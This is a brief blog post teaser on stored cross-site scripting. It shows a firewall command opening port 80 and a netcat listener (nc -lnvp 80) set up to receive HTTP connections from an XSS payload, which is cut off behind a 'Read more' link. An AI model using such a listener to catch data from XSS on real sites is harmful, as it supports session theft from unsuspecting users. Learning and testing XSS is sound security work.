Cross site scripting(XSS) Get link Facebook X Pinterest Email Other Apps July 28, 2022 stored xss payload 1 (using netcat command to listen to my own host machine allowing the port 80 to accept http connection) sudo ufw allow 80/tcp comment'Accept http connection' nc -lnvp 80 Read more